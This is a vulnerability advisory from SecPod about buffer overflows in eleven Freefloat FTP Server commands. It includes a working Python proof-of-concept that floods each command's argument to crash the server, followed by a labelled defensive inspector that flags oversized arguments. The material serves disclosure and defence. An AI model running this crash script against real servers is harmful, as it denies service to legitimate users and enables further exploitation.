Freefloat FTP Server Post-Auth Multiple Commands Buffer Overflow Vulnerabilities

A SecPod Research Team member (Veerendra G.G) has found multiple buffer overflow vulnerabilities in Freefloat FTP Server. The flaws are caused by input validation errors in the processing of the DELE, MDTM, RETR, RMD, RNFR, RNTO, STOU, STOR, SIZE, APPE and STAT commands. Sending an overly long argument to any of these commands overflows a buffer, which can be exploited to execute arbitrary code or to crash a vulnerable server, denying service to legitimate users.

PoC: Download here.

More information on the flaws can be found here.


#!/usr/bin/python
##############################################################################
# Title     : Freefloat FTP Server Multiple Buffer Overflow Vulnerabilities
# Author    : Veerendra G.G from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.freefloat.com/sv/utilities-tools/utilities-tools.php
# Advisory  : https://www.secpod.com/blog/?p=310
#             http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py
#             http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt
# Version   : Freefloat FTP Server Version 1.0
# Date      : 21/07/2011
##############################################################################

import sys, socket

def exploit(HOST, PORT, CMD):
    try:
        tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        tcp_sock.connect((HOST, PORT))
    except Exception, msg:
        print "[-] Not able to connect to : " , HOST
        sys.exit(0)

    res = tcp_sock.recv(1024)

    if "220 FreeFloat" not in res:
        print "[-] FreeFloat FTP Server Not Found..."
        tcp_sock.close()
        sys.exit(0)

    tcp_sock.send("USER test\r\n")
    tcp_sock.recv(1024)
    tcp_sock.send("PASS test\r\n")
    tcp_sock.recv(1024)

    tcp_sock.send(CMD + " "+ "A" * 1000 + "\r\n")
    tcp_sock.close()

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print "\t[-] Usage: python exploit.py target_ip"
        print "\t[-] Example : python exploit.py 127.0.0.1"
        print "\t[-] Exiting..."
        sys.exit(0)

    HOST = sys.argv[1]
    PORT = 21

    ## Vulnerable Commands
    CMDs = ["DELE", "MDTM", "RETR", "RMD", "RNFR",
            "RNTO", "STOU", "STOR", "SIZE", "APPE", "STAT"]

    for CMD in CMDs:
        print "[+] Connecting with server..."
        exploit(HOST, PORT, CMD)
        print "[+] Exploit Sent with %s command..." %(CMD)
        print "[+] Checking Server Crashed or not..."

        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((HOST, PORT))
            s.close()
        except Exception, msg:
            print "[+] Server Crashed with %s Command" %(CMD)
            sys.exit(0)
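
A defensive counterpart to the PoC above, added here as an example and not part of SecPod's advisory or PoC: an inspector for the client side of an FTP control channel that flags oversized arguments to the commands the advisory lists, even when a command is split across TCP segments. The class and method names, the 255-byte argument limit and the 4096-byte line limit are assumptions to be tuned for the deployment.

```python
# Added example (not SecPod's code): flag oversized arguments to the FTP
# commands named in the advisory, tracking one control-channel session.
AFFECTED = {"DELE", "MDTM", "RETR", "RMD", "RNFR", "RNTO",
            "STOU", "STOR", "SIZE", "APPE", "STAT"}  # list from the advisory
MAX_ARG_LEN = 255  # assumed limit; set to the longest path you legitimately serve


class FtpSessionInspector:
    """Reassembles client-to-server control bytes and inspects each command line."""

    def __init__(self, max_arg_len=MAX_ARG_LEN, max_line_len=4096):
        self.max_arg_len = max_arg_len
        self.max_line_len = max_line_len  # assumed cap on an unterminated line
        self.buf = b""
        self.authenticated = False

    def note_server_reply(self, code):
        """Feed the server's numeric reply codes; 230 means login succeeded."""
        if code == 230:
            self.authenticated = True

    def feed(self, chunk):
        """Accept raw client bytes in any segmentation; return a list of alerts.

        Each alert is a tuple (verb, argument_or_buffer_length, auth_state).
        """
        alerts = []
        self.buf += chunk
        while b"\n" in self.buf:
            line, self.buf = self.buf.split(b"\n", 1)
            alerts.extend(self._inspect(line.rstrip(b"\r")))
        if len(self.buf) > self.max_line_len:
            # A line that never terminates is suspicious on its own: alert, drop.
            alerts.append(("UNTERMINATED", len(self.buf), self._state()))
            self.buf = b""
        return alerts

    def _state(self):
        return "post-auth" if self.authenticated else "pre-auth"

    def _inspect(self, line):
        verb, _, arg = line.partition(b" ")
        verb = verb.decode("ascii", "replace").upper()  # FTP verbs are case-insensitive
        if verb in AFFECTED and len(arg) > self.max_arg_len:
            return [(verb, len(arg), self._state())]
        return []
```

The same length check can be enforced inline by an FTP-aware proxy or IDS rule in front of a server that cannot be replaced.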

We welcome any feedback or suggestions. Read more about SecPod’s SanerNow Vulnerability Management, Patch Management, and Endpoint Management.
Cheers!
SecPod Research Team
